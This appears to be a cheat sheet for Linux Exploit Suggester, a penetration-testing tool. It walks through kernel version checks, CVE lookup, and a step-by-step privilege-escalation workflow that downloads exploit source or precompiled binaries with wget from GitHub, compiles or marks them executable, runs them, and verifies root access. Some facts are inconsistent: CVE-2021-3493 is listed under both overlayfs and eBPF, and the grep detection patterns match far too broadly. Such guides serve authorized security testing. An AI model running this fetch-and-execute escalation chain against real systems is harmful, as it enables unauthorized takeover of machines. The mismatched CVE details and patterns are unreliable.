Linux-Exploit-Suggester

Linux Exploit Suggester matches target system information against known kernel vulnerabilities and suggests appropriate exploits.

Installation

# Download and make executable
wget https://github.com/mzet-/linux-exploit-suggester/raw/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh

# Or clone repository
git clone https://github.com/mzet-/linux-exploit-suggester.git
cd linux-exploit-suggester
chmod +x linux-exploit-suggester.sh

Basic Usage

Command	Description
`./linux-exploit-suggester.sh`	Auto-detect system and suggest exploits
`./linux-exploit-suggester.sh -k 5.10.0`	Check specific kernel version
`./linux-exploit-suggester.sh -h`	Display help
`./linux-exploit-suggester.sh --list`	List all available exploits

System Information Gathering

Kernel Version Detection

# Primary kernel version check
uname -r
cat /proc/version

# Example output: 5.10.0-13-generic
# Format: MAJOR.MINOR.PATCH-BUILD-FLAVOR

Detailed System Info

# Get system info for matching
hostnamectl
cat /etc/os-release
cat /etc/lsb-release

# Kernel build info
cat /proc/cmdline
cat /sys/kernel/debug/kmemleak

Common Kernel Vulnerabilities

DirtyCOW (CVE-2016-5195)

# Affects: Linux 2.6.x through 4.8 (and some backports)
# Impact: Local privilege escalation via memory exploitation
# Detection:
uname -r | grep -E "2.6|3.|4.[0-8]"

Overlayfs (CVE-2021-3493)

# Affects: Linux 4.9 to 5.11 (and some backports)
# Impact: Privilege escalation via overlay filesystem
# Detection:
uname -r | grep -E "4.9|5.[0-9]|5.10"

DIRTY PIPE (CVE-2022-0847)

# Affects: Linux 5.8 to 5.16
# Impact: Write to arbitrary files as unprivileged user
# Detection:
uname -r | grep -E "5.[8-9]|5.1[0-6]"

eBPF UAF (CVE-2021-3493, CVE-2022-22942)

# Affects: Linux 5.x versions
# Impact: Kernel panic or privilege escalation
# Detection:
uname -r | grep -E "5.[0-9]"

Running the Tool

Basic Execution

# Automatic detection
./linux-exploit-suggester.sh

# Output format:
# Searching among 185 exploits...
# Possible Exploits:
# [+] CVE-XXXX-XXXXX - <Vulnerability Name>
#     Type: local/remote
#     Danger: high/medium/low

Manual Kernel Specification

# Test specific kernel version
./linux-exploit-suggester.sh -k 4.19.0

# Useful for:
# - Testing before patching
# - Simulating other systems
# - Cross-system analysis

List All Exploits

# View all vulnerability database
./linux-exploit-suggester.sh --list

# Shows all known CVEs with:
# - CVE ID
# - Vulnerability name
# - Affected kernel versions
# - Exploit location

Interpretation of Results

Danger Levels

Critical/High: Immediate privilege escalation, DoS
Medium: Limited impact, requires specific conditions
Low: Info disclosure, limited capabilities

Exploit Types

Local: Requires access to target system
Remote: Exploitable over network (rare for kernel)

Finding and Downloading Exploits

From Exploit-DB

# Once CVE is identified
searchsploit "CVE-2021-3493"
searchsploit "Overlayfs privilege escalation"

# Example result:
# Linux Kernel < 5.12.4 (OverlayFS) - Local Privilege Escalation | linux/local/49650.c

# Download
searchsploit -m 49650
gcc 49650.c -o overlayfs_exploit

From Vendor Security Updates

# Check vendor security advisories
# - https://access.redhat.com/
# - https://launchpad.net/ubuntu/
# - https://www.suse.com/security/

# Often contain patch or exploit details

Exploitation Workflow

Step 1: Gather System Info

./linux-exploit-suggester.sh > suggester_output.txt
uname -a
cat /etc/os-release

Step 2: Identify Exploitable CVEs

# Review output for critical/high danger exploits
grep -E "CVE|Type: local|Danger: (critical|high)" suggester_output.txt

Step 3: Research Exploit

# Search Exploit-DB
searchsploit "CVE-2021-3493"

# Check GitHub repositories
# - github.com/briskets/CVE-XXXX-XXXX
# - github.com/offensive-security/exploit-database

# Read PoC code and requirements

Step 4: Compile and Test

# Download exploit source
wget https://raw.githubusercontent.com/briskets/CVE-2021-3493/main/exploit.c

# Compile (match architecture)
gcc -o exploit exploit.c

# Or download precompiled
wget https://github.com/user/repo/raw/main/exploit-x64
chmod +x exploit-x64

Step 5: Execute

./exploit
# or
./exploit-x64

# Verify privilege escalation
id
sudo -l
whoami

Common Exploit Locations

GitHub Repositories

https://github.com/briskets/CVE-XXXX-XXXX
https://github.com/offensive-security/exploit-database
https://github.com/xcellerator/linux_kernel_cves

Exploit Databases

https://www.exploit-db.com/
https://packetstormsecurity.com/
https://securityfocus.com/

Metasploit

# Search Metasploit database
msfconsole
msf > search type:exploit CVE-2021-3493
msf > use exploit/linux/local/overlayfs_exploit
msf > set LHOST <IP>
msf > run

Best Practices

Always verify CVE matches your exact kernel version
Test exploits in VM first if possible
Download from trusted sources only
Read exploit code before running
Have backup/restore plan
Document exploitation path for reporting

Exploitation Safety

# Create backup before attempting kernel exploit
tar czf /tmp/system_backup.tar.gz /etc /home /var/www

# Run exploit with output redirection
./exploit > exploit_output.txt 2>&1

# Monitor system after exploitation
dmesg | tail -20

# Check for kernel panic or issues
tail -f /var/log/kern.log

LinPEAS: Comprehensive privilege escalation scanner
LinEnum: Detailed Linux enumeration
GTFOBins: Binary exploitation database
pspy: Process monitoring tool
SearchSploit: Offline exploit search

Kernel CVE Database

The tool includes database of kernel vulnerabilities by version:

2.6.x: DirtyCOW family, memory exploits
3.x: Various privilege escalation vectors
4.x: Overlayfs, eBPF vulnerabilities
5.x: DIRTY PIPE, newer kernel exploits

Database regularly updated with new CVEs and proof-of-concepts.

Last updated: March 2025 | GitHub